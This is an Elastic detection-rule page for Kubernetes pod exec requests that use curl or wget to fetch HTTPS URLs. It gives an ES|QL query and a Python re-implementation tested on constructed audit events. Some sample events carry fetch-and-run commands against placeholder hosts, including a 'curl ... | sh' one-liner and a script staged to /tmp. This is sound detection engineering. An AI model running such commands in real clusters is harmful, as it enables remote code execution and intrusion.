Kubernetes Pod Exec with Curl or Wget to HTTPS

Last updated: 2026-04-23
Created: 2026-04-23

About

Detects Kubernetes audit events for pod exec API calls (objectRef.subresource is "exec") whose decoded request query implies curl or wget fetching an https URL. Attackers with permission to exec into workloads often run one-liners to stage tooling, pull scripts or binaries, or exfiltrate data over HTTPS; compared with interactive shells, debuggers or expected health checks, this should be rare. The rule URL-decodes the audit requestURI, reconstructs a readable command string from the repeated command= parameters (the exec subresource passes each argument as its own command= parameter, with spaces encoded as +), and applies noise filters for common cluster health and OIDC/JWKS endpoints so benign automation is less likely to alert. Two limits of the query are worth knowing when tuning: the GROK pattern only captures the arguments when a container, stdin, stdout or stderr parameter follows them in the query, and the curl/wget match is case-sensitive, so exec requests that do not fit that shape are not reconstructed and do not alert.
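To check the rule's reconstruction and filtering logic without a cluster, here is an added example (not part of the Elastic rule or the kubernetes integration) that re-implements the URL_DECODE, GROK, REPLACE and RLIKE steps in Python and runs them over constructed Kubernetes audit events. The events use the raw audit.k8s.io/v1 field names (requestURI, objectRef.subresource); in Elastic these land under kubernetes.audit.*. The hostnames, usernames and pod names are placeholders, and the sixth event is constructed to show the case where the GROK pattern fails because no container/stdin/stdout/stderr parameter follows the command parameters.

```python
# Added example: offline re-implementation of the rule's decoding, command
# reconstruction and noise filtering, run over constructed audit events.
import json
import re
from urllib.parse import unquote

# Equivalent of the rule's GROK: %{DATA} is a non-greedy ".*?", %{GREEDYDATA}
# is ".*". The capture must be followed by a container/stdin/stdout/stderr
# parameter, otherwise the GROK (and this regex) does not match.
EXEC_RE = re.compile(r".*?/exec\?(.*?)&(?:container|stdin|stdout|stderr)=.*")

# RLIKE is a full match in ES|QL, hence the surrounding ".*" and fullmatch().
MATCH_RE = re.compile(r".*(curl.*https|wget.*https).*")
NOISE_RE = re.compile(
    r".*(/api/v1/health|/healthz|/readyz|/livez|127\.0\.0\.1|localhost"
    r"|/openid/v1/jwks|/openid-connect/certs|/\.well-known/openid-configuration"
    r"|/\.well-known/jwks\.json|kubernetes\.default\.svc).*"
)


def reconstruct_command(request_uri: str):
    """URL_DECODE + GROK + the three REPLACE steps; None where GROK fails."""
    decoded = unquote(request_uri)  # URL_DECODE; '+' is left alone here
    m = EXEC_RE.fullmatch(decoded)
    if not m:
        return None
    command = m.group(1).replace("command=", "")  # drop the repeated parameter name
    command = command.replace("&", " ")           # one argument per '&'
    return command.replace("+", " ")              # '+' is how spaces are encoded


def evaluate(event: dict):
    """Return the reconstructed command if this audit event would alert."""
    if event.get("objectRef", {}).get("subresource") != "exec":
        return None
    uri = event.get("requestURI", "")
    if "command=" not in uri:  # LIKE "*command=*"
        return None
    command = reconstruct_command(uri)
    if command is None:
        return None
    if MATCH_RE.fullmatch(command) and not NOISE_RE.fullmatch(command):
        return command
    return None


def run_rule(events):
    """Apply evaluate() to audit events; return (user, pod, command) per alert."""
    hits = []
    for ev in events:
        command = evaluate(ev)
        if command is not None:
            hits.append((ev["user"]["username"], ev["objectRef"]["name"], command))
    return hits


def _exec_event(user, pod, query):
    # Constructed audit event in the raw Kubernetes audit.k8s.io/v1 shape.
    return {
        "kind": "Event", "verb": "create",
        "user": {"username": user},
        "objectRef": {"resource": "pods", "subresource": "exec",
                      "namespace": "default", "name": pod},
        "requestURI": f"/api/v1/namespaces/default/pods/{pod}/exec?{query}",
    }


# Constructed sample events; hostnames are placeholders, not real infrastructure.
SAMPLE_EVENTS = [
    # 1. staging a script over HTTPS: alerts
    _exec_event("dev@example.test", "app-1",
                "command=curl&command=-sSL&command=https%3A%2F%2Fexample.invalid%2Fstage.sh"
                "&command=-o&command=%2Ftmp%2Fs.sh&container=app&stdin=false&stdout=true&stderr=true&tty=false"),
    # 2. sh -c "curl https://... | sh": spaces arrive as '+', still alerts
    _exec_event("dev@example.test", "app-2",
                "command=sh&command=-c&command=curl+https%3A%2F%2Fexample.invalid%2Fx+%7C+sh"
                "&container=app&stdin=false&stdout=true&stderr=true&tty=false"),
    # 3. local health probe: suppressed by the noise filter (127.0.0.1, /healthz)
    _exec_event("ops-bot", "app-3",
                "command=curl&command=-k&command=https%3A%2F%2F127.0.0.1%3A8443%2Fhealthz"
                "&container=app&stdout=true&stderr=true"),
    # 4. JWKS fetch via in-cluster service DNS: suppressed
    _exec_event("ops-bot", "app-4",
                "command=wget&command=-qO-&command=https%3A%2F%2Fkubernetes.default.svc%2Fopenid%2Fv1%2Fjwks"
                "&container=app&stdout=true&stderr=true"),
    # 5. interactive shell: no curl/wget, no alert
    _exec_event("dev@example.test", "app-5",
                "command=%2Fbin%2Fsh&container=app&stdin=true&stdout=true&stderr=true&tty=true"),
    # 6. same fetch as 1, but no container/stdin/stdout/stderr parameter follows
    #    the command: the GROK does not match, so the rule stays silent
    _exec_event("dev@example.test", "app-6",
                "command=curl&command=https%3A%2F%2Fexample.invalid%2Fstage.sh"),
]

if __name__ == "__main__":
    for user, pod, command in run_rule(SAMPLE_EVENTS):
        print(json.dumps({"user": user, "pod": pod, "Esql.executed_command": command}))
```

Running the script prints two alerts (events 1 and 2) and nothing for the health probe, the JWKS fetch, the plain shell, or the event whose query ends with the command parameters. That last case is the one to keep in mind when tuning: the exec request is still a curl to an https URL, but because the GROK needs a trailing container/stdin/stdout/stderr parameter, raw_commands is null and the rule never sees it.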
Tags
Data Source: Kubernetes
Domain: Kubernetes
Use Case: Threat Detection
Tactic: Execution
Tactic: Command and Control
Language: esql
Severity
high
Risk Score
73
MITRE ATT&CK™

Execution (TA0002)

Command and Control (TA0011)

License
Elastic License v2

Definition

Integration Pack
Prebuilt Security Detection Rules
Related Integrations

kubernetes

Query
text code block:
FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version
| WHERE kubernetes.audit.objectRef.subresource == "exec" AND kubernetes.audit.requestURI LIKE "*command=*"
| EVAL decoded_uri = URL_DECODE(kubernetes.audit.requestURI)
| GROK decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}"
| EVAL command = REPLACE(raw_commands, "command=", "")
| EVAL command = REPLACE(command, "&", " ")
| EVAL Esql.executed_command = REPLACE(command, "\\+", " ")
| WHERE Esql.executed_command IS NOT NULL
  AND Esql.executed_command RLIKE """.*(curl.*https|wget.*https).*"""
  AND NOT Esql.executed_command RLIKE """.*(/api/v1/health|/healthz|/readyz|/livez|127\.0\.0\.1|localhost|/openid/v1/jwks|/openid-connect/certs|/.well-known/openid-configuration|/.well-known/jwks\.json|kubernetes\.default\.svc).*"""
| KEEP *

Install detection rules in Elastic Security

Detect Kubernetes Pod Exec with Curl or Wget to HTTPS in the Elastic Security detection engine by installing this rule into your Elastic Stack.

To set up this rule, check out the installation guide for Prebuilt Security Detection Rules.